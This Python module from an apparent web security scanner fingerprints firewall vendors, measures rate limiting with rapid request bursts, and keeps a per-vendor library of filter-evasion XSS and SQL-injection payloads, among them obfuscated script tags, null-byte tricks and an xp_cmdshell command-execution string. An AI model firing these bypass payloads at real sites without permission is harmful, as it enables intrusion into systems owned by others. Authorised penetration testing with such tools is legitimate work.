"""C10 – WAF detection and bypass engine.

Fingerprints WAF vendor from headers/cookies/body patterns, auto-selects
evasion techniques per vendor, detects rate limiting, and provides
bypass payload categories.
"""

from __future__ import annotations

import re
import time
from datetime import datetime
from typing import Any

import httpx

from app.modules.base_module import BaseModule

# ---------------------------------------------------------------------------
# WAF fingerprint database
# ---------------------------------------------------------------------------

# Each entry: (vendor_slug, detection_method, patterns)
# detection_methods: headers, cookies, body, status_code
_WAF_SIGNATURES: list[dict[str, Any]] = [
    {
        "vendor": "Cloudflare",
        "slug": "cloudflare",
        "header_patterns": {
            "server": ["cloudflare"],
            "cf-ray": [r".+"],
        },
        "cookie_patterns": ["__cfduid", "cf_clearance"],
        "body_patterns": [
            "Attention Required! | Cloudflare",
            "Ray ID:",
            "cloudflare-nginx",
        ],
        "status_codes": [403, 503],
    },
    {
        "vendor": "Akamai",
        "slug": "akamai",
        "header_patterns": {
            "server": ["akamaighost", "akamai"],
            "x-check-cacheable": [r".+"],
            "x-akamai-transformed": [r".+"],
        },
        "cookie_patterns": ["ak_bmsc", "bm_sv"],
        "body_patterns": [
            "Access Denied",
            "Reference&#32;&#35;",
            "akamaiedge.net",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "AWS WAF",
        "slug": "aws_waf",
        "header_patterns": {
            "x-amzn-requestid": [r".+"],
            "x-amz-cf-id": [r".+"],
        },
        "cookie_patterns": ["aws-waf-token"],
        "body_patterns": [
            "AWS WAF",
            "Request blocked",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "Azure WAF (Front Door)",
        "slug": "azure_waf",
        "header_patterns": {
            "x-azure-ref": [r".+"],
            "x-fd-healthprobe": [r".+"],
        },
        "cookie_patterns": [],
        "body_patterns": [
            "Microsoft Azure Web Application Firewall",
            "The request is blocked",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "Imperva / Incapsula",
        "slug": "imperva",
        "header_patterns": {
            "x-iinfo": [r".+"],
            "x-cdn": ["incapsula"],
        },
        "cookie_patterns": ["incap_ses", "visid_incap"],
        "body_patterns": [
            "Incapsula incident ID",
            "Request unsuccessful. Incapsula incident",
            "_Incapsula_Resource",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "F5 BIG-IP ASM",
        "slug": "f5_bigip",
        "header_patterns": {
            "server": ["bigip"],
            "x-cnection": [r".+"],
        },
        "cookie_patterns": ["ts", "BIGipServer"],
        "body_patterns": [
            "The requested URL was rejected",
            "Support ID:",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "ModSecurity",
        "slug": "modsecurity",
        "header_patterns": {
            "server": ["mod_security", "modsecurity", "mod_fcgid"],
        },
        "cookie_patterns": [],
        "body_patterns": [
            "Not Acceptable!",
            "406 Not Acceptable",
            "ModSecurity",
            "This error was generated by Mod_Security",
        ],
        "status_codes": [406, 501],
    },
    {
        "vendor": "Sucuri",
        "slug": "sucuri",
        "header_patterns": {
            "server": ["sucuri/cloudproxy", "sucuri"],
            "x-sucuri-id": [r".+"],
            "x-sucuri-cache": [r".+"],
        },
        "cookie_patterns": [],
        "body_patterns": [
            "Sucuri WebSite Firewall",
            "Access Denied - Sucuri Website Firewall",
            "sucuri.net",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "Barracuda",
        "slug": "barracuda",
        "header_patterns": {
            "server": ["barracuda"],
        },
        "cookie_patterns": ["barra_counter_session"],
        "body_patterns": [
            "You have been blocked",
            "Barracuda Networks",
        ],
        "status_codes": [403],
    },
    {
        "vendor": "Fastly",
        "slug": "fastly",
        "header_patterns": {
            "x-served-by": [r"cache-"],
            "x-cache": [r"HIT", r"MISS"],
            "fastly-restarts": [r".+"],
        },
        "cookie_patterns": [],
        "body_patterns": ["Fastly error"],
        "status_codes": [403],
    },
]

# ---------------------------------------------------------------------------
# Bypass payload library
# ---------------------------------------------------------------------------

_BYPASS_PAYLOADS: dict[str, dict[str, list[str]]] = {
    "cloudflare": {
        "xss": [
            "<svg/onload=alert`1`>",
            "<img src=x:x onerror=alert(1)>",
            "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/",
            "<details/open/ontoggle=alert(1)>",
        ],
        "sqli": [
            "' /*!UNION*/ /*!SELECT*/ NULL--",
            "' OR 1=1--+",
            "'%20OR%201=1--",
            "' OR/**/'1'='1",
        ],
        "general": [
            "<!--",
            "%0d%0a",
        ],
    },
    "akamai": {
        "xss": [
            "<ScRiPt>alert(1)</ScRiPt>",
            "<<script>alert(1)//<</script>",
            "%3Cscript%3Ealert(1)%3C/script%3E",
        ],
        "sqli": [
            "'%09OR%091=1--",
            "' OR 0x31=0x31--",
            "' /*!50000union*/ select null--",
        ],
        "general": [
            "%u003c%u0073cript%u003e",
        ],
    },
    "aws_waf": {
        "xss": [
            "<ScRiPt>alert(1)</ScRiPt>",
            "<img/src=x onerror=alert(1)>",
        ],
        "sqli": [
            "' OR '1'='1'--",
            "1 UNION SELECT NULL--",
        ],
        "general": [
            "Content-Type: text/html\r\nX-Custom: injection",
        ],
    },
    "modsecurity": {
        "xss": [
            "<script>al\u0000ert(1)</script>",
            "<img src='#' on\x00error='alert(1)'>",
            "<svg><script>alert&#40;1&#41;</script></svg>",
        ],
        "sqli": [
            "' /*!50000union*/ /*!50000select*/ NULL--",
            "'/**/OR/**/1=1--",
            "' OR 'unusual'='unusual",
        ],
        "general": [
            "/../",
            "%2e%2e%2f",
        ],
    },
    "imperva": {
        "xss": [
            "<%00script>alert(1)</%00script>",
            "<script\\x20>alert(1)</script>",
        ],
        "sqli": [
            "' OR%001=1--",
            "' OR 0b1=0b1--",
        ],
        "general": [
            "\x00",
        ],
    },
    "f5_bigip": {
        "xss": [
            "<SCRIPT>alert(1)</SCRIPT>",
            "\"><script>alert(1)</script>",
        ],
        "sqli": [
            "'; EXEC xp_cmdshell('id')--",
            "'||'1'='1",
        ],
        "general": [
            "%0aHeader: injected",
        ],
    },
    "sucuri": {
        "xss": [
            "<svG onload=prompt(1)>",
            "<img src onerror=prompt(1)>",
        ],
        "sqli": [
            "' OR 'sucu'='sucu",
            "1 UNION ALL SELECT NULL--",
        ],
        "general": [],
    },
    "barracuda": {
        "xss": [
            "<scr\x00ipt>alert(1)</scr\x00ipt>",
        ],
        "sqli": [
            "' OR 'b'='b",
        ],
        "general": [],
    },
    "azure_waf": {
        "xss": [
            "<svg/onload=confirm(1)>",
        ],
        "sqli": [
            "' OR 1=1 LIMIT 1--",
        ],
        "general": [],
    },
    "fastly": {
        "xss": [
            "<IFRAME SRC=javascript:alert(1)></IFRAME>",
        ],
        "sqli": [
            "' UNION SELECT NULL,NULL--",
        ],
        "general": [],
    },
    "unknown": {
        "xss": [
            "<script>alert(1)</script>",
        ],
        "sqli": [
            "' OR 1=1--",
        ],
        "general": [],
    },
}


# ---------------------------------------------------------------------------
# Module
# ---------------------------------------------------------------------------


class WAFDetector(BaseModule):
    """WAF detection and bypass engine."""

    name = "waf_detector"
    description = (
        "Fingerprint WAF vendor from headers/cookies/body, auto-select evasion "
        "techniques, detect rate limiting, and provide bypass payloads per vendor."
    )
    version = "1.0.0"
    category = "evasion"

    # ------------------------------------------------------------------ #
    # Public entry-point                                                   #
    # ------------------------------------------------------------------ #

    async def run(self, target: str, **kwargs: Any) -> dict[str, Any]:
        """Detect WAF and generate bypass strategies for *target*.

        Args:
            target: Base URL of the target.
            **kwargs:
                - timeout (int): Request timeout in seconds (default 10).
                - probe_payloads (bool): Whether to send WAF trigger probes (default True).
                - rate_limit_requests (int): Number of requests for rate-limit detection (default 30).
        """
        self.started_at = datetime.utcnow()
        base = target if target.startswith("http") else f"https://{target}"
        timeout: int = int(kwargs.get("timeout", 10))
        probe: bool = bool(kwargs.get("probe_payloads", True))
        rl_count: int = int(kwargs.get("rate_limit_requests", 30))

        async with httpx.AsyncClient(
            timeout=timeout, verify=False, follow_redirects=True
        ) as client:
            # Baseline request
            baseline = await self._baseline_request(client, base)
            waf_vendor = self._fingerprint(baseline) if baseline else None

            if waf_vendor:
                self.add_finding(
                    title=f"WAF Detected – {waf_vendor['vendor']}",
                    severity="info",
                    description=(
                        f"A {waf_vendor['vendor']} WAF was identified based on "
                        f"{waf_vendor['detection_method']}. "
                        "Bypass payloads have been selected for this vendor."
                    ),
                    evidence=waf_vendor["evidence"],
                    url=base,
                    waf_vendor=waf_vendor["slug"],
                    detection_method=waf_vendor["detection_method"],
                )
            else:
                self.add_finding(
                    title="No WAF Detected (or Unknown WAF)",
                    severity="info",
                    description="No known WAF signatures were matched in baseline responses.",
                    url=base,
                )

            vendor_slug = waf_vendor["slug"] if waf_vendor else "unknown"

            # Send WAF trigger probes and confirm detection
            if probe:
                triggered = await self._probe_waf_trigger(client, base, vendor_slug)
                if triggered and not waf_vendor:
                    self.add_finding(
                        title="WAF Detected via Trigger Probe (Unidentified Vendor)",
                        severity="medium",
                        description=(
                            "WAF behaviour was confirmed by sending a known-malicious "
                            "request that was blocked, but the vendor could not be identified "
                            "from response signatures."
                        ),
                        evidence=triggered,
                        url=base,
                    )

            # Rate limit detection
            await self._detect_rate_limit(client, base, rl_count)

        # Compile bypass payloads for the detected vendor
        bypass_payloads = _BYPASS_PAYLOADS.get(vendor_slug, _BYPASS_PAYLOADS["unknown"])
        self.add_finding(
            title=f"WAF Bypass Payloads – {vendor_slug}",
            severity="info",
            description=(
                f"Bypass payload sets generated for {vendor_slug} WAF across "
                f"{len(bypass_payloads)} categories."
            ),
            url=base,
            bypass_payloads=bypass_payloads,
            waf_vendor=vendor_slug,
        )

        self.completed_at = datetime.utcnow()
        return {**self.to_dict(), "waf_vendor": vendor_slug, "bypass_payloads": bypass_payloads}

    # ------------------------------------------------------------------ #
    # Baseline request                                                     #
    # ------------------------------------------------------------------ #

    async def _baseline_request(
        self, client: httpx.AsyncClient, url: str
    ) -> httpx.Response | None:
        try:
            return await client.get(url)
        except Exception as exc:
            self.logger.debug("Baseline request failed: %s", exc)
            return None

    # ------------------------------------------------------------------ #
    # WAF fingerprinting                                                   #
    # ------------------------------------------------------------------ #

    def _fingerprint(
        self, response: httpx.Response
    ) -> dict[str, Any] | None:
        """Match response headers, cookies, and body against WAF signatures.

        Returns a dict with vendor info if matched, else None.
        """
        headers = {k.lower(): v.lower() for k, v in response.headers.items()}
        cookies_str = " ".join(response.cookies.keys()).lower()
        body = response.text.lower()

        for sig in _WAF_SIGNATURES:
            evidence_parts: list[str] = []

            # Header matching
            for header_name, patterns in sig.get("header_patterns", {}).items():
                header_val = headers.get(header_name, "")
                for pattern in patterns:
                    if re.search(pattern, header_val, re.IGNORECASE):
                        evidence_parts.append(f"Header {header_name}: {header_val}")
                        break

            # Cookie matching
            for cookie_name in sig.get("cookie_patterns", []):
                if cookie_name.lower() in cookies_str:
                    evidence_parts.append(f"Cookie: {cookie_name}")

            # Body matching
            for pattern in sig.get("body_patterns", []):
                if pattern.lower() in body:
                    evidence_parts.append(f"Body pattern: {pattern[:60]}")
                    break

            # Status code matching
            if response.status_code in sig.get("status_codes", []):
                evidence_parts.append(f"Status: {response.status_code}")

            if evidence_parts:
                detection_method = (
                    "headers" if any("Header" in e for e in evidence_parts)
                    else "cookie" if any("Cookie" in e for e in evidence_parts)
                    else "body"
                )
                return {
                    "vendor": sig["vendor"],
                    "slug": sig["slug"],
                    "detection_method": detection_method,
                    "evidence": "; ".join(evidence_parts),
                }

        return None

    # ------------------------------------------------------------------ #
    # WAF trigger probe                                                    #
    # ------------------------------------------------------------------ #

    async def _probe_waf_trigger(
        self,
        client: httpx.AsyncClient,
        url: str,
        vendor_slug: str,
    ) -> str | None:
        """Send a known-malicious request and check if WAF blocks it.

        Returns evidence string if WAF triggered, else None.
        """
        # Use a generic XSS probe
        probe_url = f"{url}/?q=<script>alert(1)</script>"
        try:
            r = await client.get(
                probe_url,
                headers={"X-Scanner": "owasp-sentinel"},
            )
            if r.status_code in (403, 406, 429, 503):
                return (
                    f"Probe {probe_url!r} returned {r.status_code}. "
                    f"Body excerpt: {r.text[:150]}"
                )

            # Re-fingerprint against the block response
            match = self._fingerprint(r)
            if match:
                return f"Trigger probe matched {match['vendor']}: {match['evidence']}"
        except Exception as exc:
            self.logger.debug("WAF trigger probe error: %s", exc)
        return None

    # ------------------------------------------------------------------ #
    # Rate limit detection via response-time analysis                     #
    # ------------------------------------------------------------------ #

    async def _detect_rate_limit(
        self,
        client: httpx.AsyncClient,
        url: str,
        count: int,
    ) -> None:
        """Send *count* rapid requests and measure response times and status codes."""
        times: list[float] = []
        status_codes: list[int] = []

        for _ in range(count):
            start = time.monotonic()
            try:
                r = await client.get(url)
                elapsed = time.monotonic() - start
                times.append(elapsed)
                status_codes.append(r.status_code)
            except Exception:
                times.append(0.0)
                status_codes.append(0)

        rate_limited = status_codes.count(429) + status_codes.count(503)
        avg_time = sum(times) / len(times) if times else 0.0
        max_time = max(times) if times else 0.0

        if rate_limited > 0:
            self.add_finding(
                title="Rate Limiting Active",
                severity="info",
                description=(
                    f"Received {rate_limited} throttled responses (429/503) out of "
                    f"{count} rapid requests. Rate limiting is functioning."
                ),
                evidence=(
                    f"Rate-limited: {rate_limited}/{count}  "
                    f"avg_time={avg_time:.3f}s  max_time={max_time:.3f}s"
                ),
                url=url,
            )
        else:
            self.add_finding(
                title="No Rate Limiting Detected",
                severity="medium",
                description=(
                    f"All {count} rapid requests were served without throttling "
                    "(no 429/503 responses). This may enable brute-force and "
                    "enumeration attacks."
                ),
                evidence=(
                    f"Statuses seen: {list(set(status_codes))}  "
                    f"avg_time={avg_time:.3f}s  max_time={max_time:.3f}s"
                ),
                url=url,
            )

        # Detect response-time anomalies (sudden slowdowns indicate soft rate-limiting)
        if len(times) >= 10:
            first_half_avg = sum(times[: count // 2]) / (count // 2)
            second_half_avg = sum(times[count // 2 :]) / (count - count // 2)
            slowdown_factor = second_half_avg / first_half_avg if first_half_avg else 1.0
            if slowdown_factor > 2.0:
                self.add_finding(
                    title="Response-Time Based Rate Throttling Detected",
                    severity="info",
                    description=(
                        f"Response times increased by {slowdown_factor:.1f}× over {count} "
                        "rapid requests, suggesting soft/connection-level rate throttling "
                        "rather than hard 429 responses."
                    ),
                    evidence=(
                        f"First-half avg: {first_half_avg:.3f}s  "
                        f"Second-half avg: {second_half_avg:.3f}s  "
                        f"Slowdown: {slowdown_factor:.1f}×"
                    ),
                    url=url,
                )

    # ------------------------------------------------------------------ #
    # Public helper: get bypass payloads for a known vendor               #
    # ------------------------------------------------------------------ #

    def get_bypass_payloads(
        self,
        vendor_slug: str,
        category: str = "xss",
    ) -> list[str]:
        """Return bypass payloads for *vendor_slug* and attack *category*.

        Args:
            vendor_slug: WAF vendor slug (e.g. 'cloudflare', 'modsecurity').
            category: One of 'xss', 'sqli', 'general'.

        Returns:
            List of payload strings.
        """
        vendor_payloads = _BYPASS_PAYLOADS.get(vendor_slug, _BYPASS_PAYLOADS["unknown"])
        return vendor_payloads.get(category, [])
